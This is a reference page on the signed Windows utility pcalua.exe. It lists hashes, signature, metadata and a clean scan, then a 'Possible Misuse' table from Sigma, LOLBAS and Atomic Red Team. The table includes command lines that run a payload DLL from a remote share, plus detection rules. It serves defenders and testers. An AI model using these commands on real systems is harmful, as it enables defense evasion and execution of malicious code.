pcalua.exe

  • File Path: C:\WINDOWS\system32\pcalua.exe
  • Description: Program Compatibility Assistant

Hashes

Type Hash
MD5 192AFE8050468A45CFDA06E8121E0A24
SHA1 EDBC97483C2BDC605F6A4B833715A03C080C996D
SHA256 054A2731200E7414949956243D91A9AAB024A75621ADC32AFF389B7426FE56DB
SHA384 398592870C29D8372C3280AAA3E3F52FEDAB90A137C0E16A6F0D75297A777BD1FAA162E1FCE207D864062C6E0220542E
SHA512 A193E8A9282F37FC3DC27B39BF00525D6BC95AD0CE79A16E68723C3B54B70705B2A8FB2E89DDA0288BAD04D5D39CD011D28A3BE55CE6739ECE4E60D2E76B5C36
SSDEEP 768:NoOhaDTjahwBpvNiFDFc4z2d9uyUDchclHrDhKAV7KJvJwmRg7A+ljIGoxGWTGaI:N3ujViZ2d9uHhJ7yw7ljIGGGWhq
IMP DB6289009B9D69036A82B835D8E2445D
PESHA1 004CAEE8CBE4D0354BA7BE06B03504A1DF750A7C
PE256 B7A4B807D0F9A3088BDEF14DA6B251E532CFC10239C89C9FD6B27CDF3B5125E1

Runtime Data

Loaded Modules:

Path
C:\WINDOWS\System32\GDI32.dll
C:\WINDOWS\System32\gdi32full.dll
C:\WINDOWS\System32\KERNEL32.DLL
C:\WINDOWS\System32\KERNELBASE.dll
C:\WINDOWS\System32\msvcp_win.dll
C:\WINDOWS\SYSTEM32\ntdll.dll
C:\WINDOWS\system32\pcalua.exe
C:\WINDOWS\System32\ucrtbase.dll
C:\WINDOWS\System32\USER32.dll
C:\WINDOWS\System32\win32u.dll

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename:
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.1 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/73
  • VirusTotal Link: https://www.virustotal.com/gui/file/054a2731200e7414949956243d91a9aab024a75621adc32aff389b7426fe56db/detection

Possible Misuse

The following table contains possible examples of pcalua.exe being misused. While pcalua.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_indirect_cmd.yml description: Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe). DRL 1.0
sigma proc_creation_win_indirect_cmd.yml - '\pcalua.exe' DRL 1.0
LOLBAS Pcalua.yml Name: Pcalua.exe  
LOLBAS Pcalua.yml - Command: pcalua.exe -a calc.exe  
LOLBAS Pcalua.yml - Command: pcalua.exe -a \\server\payload.dll  
LOLBAS Pcalua.yml - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java  
LOLBAS Pcalua.yml - Path: C:\Windows\System32\pcalua.exe  
malware-ioc misp_invisimole.json "description": "Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.", © ESET 2014-2018
atomic-red-team index.md - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1202.md <blockquote>Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017) MIT License. © 2018 Red Canary
atomic-red-team T1202.md - Atomic Test #1 - Indirect Command Execution - pcalua.exe MIT License. © 2018 Red Canary
atomic-red-team T1202.md ## Atomic Test #1 - Indirect Command Execution - pcalua.exe MIT License. © 2018 Red Canary
atomic-red-team T1202.md The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface. MIT License. © 2018 Red Canary
atomic-red-team T1202.md pcalua.exe -a #{process} MIT License. © 2018 Red Canary
atomic-red-team T1202.md pcalua.exe -a #{payload_path} MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.